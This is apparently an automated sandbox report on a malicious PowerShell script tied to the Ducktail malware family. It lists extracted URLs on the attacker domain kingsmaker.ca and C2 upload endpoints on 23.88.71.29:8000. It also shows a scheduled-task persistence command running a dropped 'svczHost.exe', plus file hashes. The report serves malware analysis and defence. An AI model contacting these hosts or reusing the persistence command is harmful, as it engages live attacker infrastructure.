https://github.com/Pester/PesterXz	powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde650	powershell.exe, 00000001.00000002.3090409708.000001C821104000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.3090409708.000001C820B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B55331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://.jpg	powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db11	powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa667424	powershell.exe, 00000009.00000002.3329091603.000001BD0040E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.3157492838.000001C830D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3157492838.000001C830BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3071558533.0000015B653A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000005.00000002.3057536830.0000015B567AF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0057F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000005.00000002.3057536830.0000015B56186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5664D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b6043	powershell.exe, 00000001.00000002.3090409708.000001C82122B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3090409708.000001C822CAC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/MartinKuschnik/WmiLight	svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.pngh	powershell.exe, 00000005.00000002.3057536830.0000015B56806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://crl.mic	powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7ad	powershell.exe, 00000001.00000002.3090409708.000001C8211BB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd7	powershell.exe, 00000009.00000002.3329091603.000001BD0040E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729	powershell.exe, 00000001.00000002.3090409708.000001C821104000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad5	powershell.exe, 00000001.00000002.3090409708.000001C8224F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3090409708.000001C821C79000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/StaticFile/RdpService/79h	svczHost.exe, 00000010.00000002.4401647954.00000252B682A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/file2/c9af	powershell.exe, 00000001.00000002.3090409708.000001C822523000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0057F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/nativeaot-compatibilityY	myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://github.com/Pester/Pesterh	powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlh	powershell.exe, 00000005.00000002.3057536830.0000015B56806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.microsoft.c	powershell.exe, 00000014.00000002.3349142454.00000186B9B6C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/GlobalizationInvariantMode	powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.3090409708.000001C820B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B55331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e7	powershell.exe, 00000001.00000002.3090409708.000001C8211BB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://kingsmaker.ca/	powershell.exe, 00000001.00000002.3166238726.000001C838D32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3078261639.0000015B6DCC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000005.00000002.3057536830.0000015B567AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.pngXz	powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.204.249.81	unknown	United States	16625	AKAMAI-ASUS	false
172.67.179.67	kingsmaker.ca	United States	13335	CLOUDFLARENETUS	true
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
23.88.71.29	unknown	United States	18978	ENZUINC-US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565058
Start date and time:	2024-11-29 09:06:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kingsmaker_6.ca.ps1
Detection:	MAL
Classification:	mal100.troj.expl.evad.winPS1@86/146@3/4
EGA Information:	Successful, ratio: 11.1%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): CompPkgSrv.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 23.37.16.185, 52.22.41.97, 3.233.129.217, 52.6.155.20, 3.219.243.226, 23.72.90.88, 23.72.90.80, 184.28.98.118, 184.28.98.93, 184.28.98.83, 142.250.101.94
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, ssl-delivery.adobe.com.edgekey.net, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, ctldl.windowsupdate.com, p13n.adobe.io, www.gstatic.com, geo2.adobe.com, acroipm2.adobe.com, api.msn.com
Execution Graph export aborted for target myRdpService.exe, PID 5496 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 10032 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3180 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3620 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6220 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7896 because it is empty
Execution Graph export aborted for target powershell.exe, PID 9848 because it is empty
Execution Graph export aborted for target svczHost.exe, PID 9708 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: kingsmaker_6.ca.ps1

Simulations

Behavior and APIs

Time	Type	Description
03:08:55	API Interceptor	3274x Sleep call for process: powershell.exe modified
03:11:10	API Interceptor	25x Sleep call for process: myRdpService.exe modified
09:09:40	Task Scheduler	Run new task: zServicecakoi7 path: C:\Windows\Temp\svczHost.exe s>cakoi7 kingsmaker.ca

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.67	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	kingsmaker.ca/api/check
172.64.41.3	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	remi.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse
	rem.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
23.88.71.29	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Facebook_Advertiser_Position_Description.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	K05MQ5BcC8.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/client/ws
	eQwUFcwrXk.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/client/ws

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	remi.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	172.64.41.3
	rem.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	162.159.61.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
kingsmaker.ca	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	104.21.75.170
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	104.21.75.170
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.45.40.198
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	172.229.253.87
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	96.17.64.171
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	104.126.112.182
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.47.168.24
	Job Description.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.126.112.182
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	23.52.72.234
	https://www.wixsite.com/_api/invoice/2d5e7023-6014-4f5e-ab31-c1e25d999b96:9b27124a-a130-45dc-b81f-e5675b538826/view?token=56c18155-b636-4505-b95c-630f3d19901a	Get hash	malicious	HTMLPhisher	Browse	23.56.162.204
	https://www.filemail.com/d/dolcahmytquddaz	Get hash	malicious	Unknown	Browse	23.203.104.175
	Gale Associates, Inc.pdf	Get hash	malicious	Unknown	Browse	23.203.104.175
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	104.21.16.9
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	104.31.72.230
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	104.21.75.170
	RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	104.21.16.9
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	104.21.75.170
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	104.31.72.230
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	104.21.75.170
	RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse	172.67.179.67
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	172.67.179.67
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	172.67.179.67

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\myRdpService.exe	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse
	Company Booklet.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse
	Job Description.lnk.download.lnk	Get hash	malicious	RDPWrap Tool, Ducktail	Browse
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse
	Facebook_Advertiser_Position_Description.lnk	Get hash	malicious	Ducktail	Browse

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	209
Entropy (8bit):	5.249953901522807
Encrypted:	false
SSDEEP:	3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVGH5kt1llhRChX1/iTFJrqzOJkvP5mbc:men9YOFLvEWdM9QNH6twhXZi7Z+P4b0
MD5:	C38792844FEBC0DD01EB22DE2C38E574
SHA1:	61961D2148D833DAB43B35D8EE81E3FF67A35860
SHA-256:	0186A0D485A5E863D79EB330AB6BEAEE87C669B1F2F1C76BFC63EE10DB01F159
SHA-512:	D2B7846C7A65C0CD1BCDCD764E99CD8E1AC0548A70D9CE24DBA450A2FEE90788E11072352063C163B040965AB5939B3752C145FDA67D7DA285B374111EFD33B5
Malicious:	false
Preview:	0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ..A..Eo...................................*"Jl...........d.{v.^.G...d.W.:...P..k%..A..Eo................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20010
Entropy (8bit):	5.02483968322263
Encrypted:	false
SSDEEP:	384:Prib43WKmVoGIpN6KQkj2Fkjh4iUxDhQIeFzUpX+OdBNNXp5yvOjJlYoaYpib47:PRWKmV3IpNBQkj2Uh4iUxDhiFzUpX+Oh
MD5:	435D032DDB5301D507119F054ABE9587
SHA1:	E5D4154F38575B85F59ECEBAED506F2C8EBB9F73
SHA-256:	A0309E124EAB5BCDEA5BF518D641576499DE7FEAA5662CC95F6ABD5EAF5853E9
SHA-512:	23B177CC2418E2A5677DE81CBE648CA651C7DA91E06D7847C02015FA89D2A3B321800DC5E9C6E6B028436ED54A56A36785058F73C12836DC774C24BDA3E182C1
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 29 08:08:55 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1332
Entropy (8bit):	3.9741315309209404
Encrypted:	false
SSDEEP:	24:H1FzW9nvKn9c8HNwKGmNII+ycuZhN1akSzPNnqS2d:ivK/OKGmu1ul1a35qSG
MD5:	19397E84CBFB8597F5FD8AAFDF645FC0
SHA1:	0739F47A2AE2A0D4521AFECD4EAA103A9074402C
SHA-256:	C84A58108C52F5EE6F9E8F69E41DCAAC59AD8639BF2F414A01F7EF2F53A53EBF
SHA-512:	CAEEF16D29BB917D00D462D0AA1029D22DC389619E4B470B22911DD45CAF641F842EBBD09FC94D24184C01A99E290B980429AD93A98D492499ADE8A41410AC21
Malicious:	false
Preview:	L....vIg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP.................,..% \:.1Km.............5.......C:\Users\user\AppData\Local\Temp\RESBEED.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.g.p.i.i.k.l.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

Process:	C:\Windows\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	5492
Entropy (8bit):	3.2564408602149646
Encrypted:	false
SSDEEP:	96:0PVJqMXWMRUYSFd5YtU6W66zpVwkP9Odgd8zkFJdlzOkJdB0u1Jd8ui4c4d8zB/H:sVJqgUZ/5+g7P94RgFx9R43Zy1TbZH56
MD5:	A766DECEF71813234AAF41DB4EF5086E
SHA1:	564473B1CB74ED13E820C62F30642836B8D983C6
SHA-256:	8CA780CD4F6488CBBB1B6999D935B4F8352B36B3E2E1E54301875C6483A87535
